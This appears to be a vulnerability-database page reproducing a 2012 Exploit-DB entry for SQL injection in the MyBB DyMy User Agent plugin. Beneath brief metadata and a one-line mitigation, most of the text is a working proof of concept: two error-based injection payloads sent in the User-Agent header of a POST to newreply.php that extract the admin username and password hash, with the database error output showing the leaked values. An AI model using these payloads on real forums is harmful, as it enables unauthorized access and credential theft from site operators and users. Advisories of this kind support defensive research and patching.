MyBB DyMy User Agent Plugin SQL injection vulnerability.

vendor:

DyMy User Agent Plugin

by:

JoinSe7en

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: DyMy User Agent Plugin

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2012

MyBB DyMy User Agent Plugin SQL injection vulnerability.

MyBB DyMy User Agent Plugin is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords. This can be done by sending a specially crafted HTTP request with a malicious User-Agent header. The PoC (Proof of Concept) provided in the text can be used to receive the admin username and password.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

############################################################################
# Exploit title : MyBB DyMy User Agent Plugin SQL injection vulnerability. #
# Author: JoinSe7en                                                        #
# Date : 13 Dec 2012                                                       #
# Tested on : Linux                                                        #
# Category : Web Applications                                              #
# Software Link : http://mods.mybb.com/view/dymy-user-agent                #
############################################################################


[*] PoC (receive admin username)

We fire up HTTP Live Headers or a similar tool, post something and press 'replay'.
We then replace our user agent with the following Query:

POST http://localhost/mybb/newreply.php?ajax=1

HTTP Headers:
Host: localhost
User-Agent: ' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #

Output:

SQL Error:
1062 - Duplicate entry 'admin1' for key 'group_key'

+------------------------------------------------------------------+

[*] PoC (receive admin password)

We then replace our user agent with the following Query:

POST http://localhost/mybb/newreply.php?ajax=1

HTTP Headers:
Host: localhost
User-Agent: ' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #

Output:
SQL Error:
1062 - Duplicate entry '098f6bcd4621d373cade4e832627b4f6' for key 'group_key'

+------------------------------------------------------------------+


Enjoy.